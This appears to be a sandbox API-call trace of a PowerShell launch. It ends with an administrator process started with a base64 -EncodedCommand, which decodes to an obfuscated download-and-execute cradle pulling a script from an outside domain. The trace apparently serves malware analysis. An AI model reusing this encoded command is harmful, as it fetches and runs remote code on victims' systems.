	[0327.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.767] SetErrorMode (uMode=0x1) returned 0x1
	[0327.767] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.767] SetErrorMode (uMode=0x1) returned 0x1
	[0327.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.768] SetErrorMode (uMode=0x1) returned 0x1
	[0327.768] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.768] SetErrorMode (uMode=0x1) returned 0x1
	[0327.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.768] SetErrorMode (uMode=0x1) returned 0x1
	[0327.768] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.768] SetErrorMode (uMode=0x1) returned 0x1
	[0327.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.769] SetErrorMode (uMode=0x1) returned 0x1
	[0327.769] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.769] SetErrorMode (uMode=0x1) returned 0x1
	[0327.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.769] SetErrorMode (uMode=0x1) returned 0x1
	[0327.770] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.770] SetErrorMode (uMode=0x1) returned 0x1
	[0327.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.770] SetErrorMode (uMode=0x1) returned 0x1
	[0327.770] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.770] SetErrorMode (uMode=0x1) returned 0x1
	[0327.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.771] SetErrorMode (uMode=0x1) returned 0x1
	[0327.771] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.771] SetErrorMode (uMode=0x1) returned 0x1
	[0327.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.771] SetErrorMode (uMode=0x1) returned 0x1
	[0327.771] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.772] SetErrorMode (uMode=0x1) returned 0x1
	[0327.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.772] SetErrorMode (uMode=0x1) returned 0x1
	[0327.772] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.772] SetErrorMode (uMode=0x1) returned 0x1
	[0327.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.773] SetErrorMode (uMode=0x1) returned 0x1
	[0327.773] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.773] SetErrorMode (uMode=0x1) returned 0x1
	[0327.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.773] SetErrorMode (uMode=0x1) returned 0x1
	[0327.773] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.774] SetErrorMode (uMode=0x1) returned 0x1
	[0327.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.774] SetErrorMode (uMode=0x1) returned 0x1
	[0327.774] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.774] SetErrorMode (uMode=0x1) returned 0x1
	[0327.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.775] SetErrorMode (uMode=0x1) returned 0x1
	[0327.775] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.775] SetErrorMode (uMode=0x1) returned 0x1
	[0327.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.775] SetErrorMode (uMode=0x1) returned 0x1
	[0327.775] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.776] SetErrorMode (uMode=0x1) returned 0x1
	[0327.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.776] SetErrorMode (uMode=0x1) returned 0x1
	[0327.776] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.776] SetErrorMode (uMode=0x1) returned 0x1
	[0327.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.777] SetErrorMode (uMode=0x1) returned 0x1
	[0327.777] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.777] SetErrorMode (uMode=0x1) returned 0x1
	[0327.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.777] SetErrorMode (uMode=0x1) returned 0x1
	[0327.777] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.778] SetErrorMode (uMode=0x1) returned 0x1
	[0327.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.778] SetErrorMode (uMode=0x1) returned 0x1
	[0327.778] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.778] SetErrorMode (uMode=0x1) returned 0x1
	[0327.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.779] SetErrorMode (uMode=0x1) returned 0x1
	[0327.779] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.779] SetErrorMode (uMode=0x1) returned 0x1
	[0327.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.779] SetErrorMode (uMode=0x1) returned 0x1
	[0327.779] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x394240
	[0327.780] FindNextFileW (in: hFindFile=0x394240, lpFindFileData=0x1c77dad0 | out: lpFindFileData=0x1c77dad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.781] FindClose (in: hFindFile=0x394240 | out: hFindFile=0x394240) returned 1
	[0327.781] SetErrorMode (uMode=0x1) returned 0x1
	[0327.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c77dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0327.782] SetErrorMode (uMode=0x1) returned 0x1
	[0327.782] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c77ddf0 | out: lpFileInformation=0x1c77ddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0327.782] SetErrorMode (uMode=0x1) returned 0x1
	[0328.764] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0328.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.765] CoTaskMemFree (pv=0x329f30) 
	[0329.257] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0329.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.257] CoTaskMemFree (pv=0x329f30) 
	[0329.260] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0329.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.260] CoTaskMemFree (pv=0x329f30) 
	[0329.270] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0329.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.270] CoTaskMemFree (pv=0x329f30) 
	[0329.976] CoTaskMemAlloc (cb=0x3b) returned 0x1b719010
	[0330.432] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c77dfd8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c77dfd8) returned 0x4550
	[0330.432] CoTaskMemFree (pv=0x1b719010) 
	[0330.435] GetConsoleWindow () returned 0x301e0
	[0330.441] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0330.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.441] CoTaskMemFree (pv=0x329f30) 
	[0330.442] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0330.442] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.442] CoTaskMemFree (pv=0x329f30) 
	[0330.448] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0330.448] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.448] CoTaskMemFree (pv=0x329f30) 
	[0330.450] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c77e020 | out: pNumArgs=0x1c77e020) returned 0x330e50*=""
	[0330.451] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.452] CoTaskMemAlloc (cb=0x22) returned 0x1b725840
	[0330.452] RtlMoveMemory (in: Destination=0x1b725840, Source=0x330e72, Length=0x20 | out: Destination=0x1b725840) 
	[0330.452] CoTaskMemFree (pv=0x1b725840) 
	[0330.452] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.452] CoTaskMemAlloc (cb=0x2f4) returned 0x1b709e70
	[0330.452] RtlMoveMemory (in: Destination=0x1b709e70, Source=0x330e92, Length=0x2f2 | out: Destination=0x1b709e70) 
	[0330.452] CoTaskMemFree (pv=0x1b709e70) 
	[0330.453] LocalFree (hMem=0x330e50) returned 0x0
	[0331.194] CoTaskMemAlloc (cb=0x804) returned 0x1b71eca0
	[0331.194] GetConsoleTitleW (in: lpConsoleTitle=0x1b71eca0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0331.194] CoTaskMemFree (pv=0x1b71eca0) 
	[0331.205] CoTaskMemAlloc (cb=0x38e) returned 0x330e50
	[0331.205] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c77df80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3001c58 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", 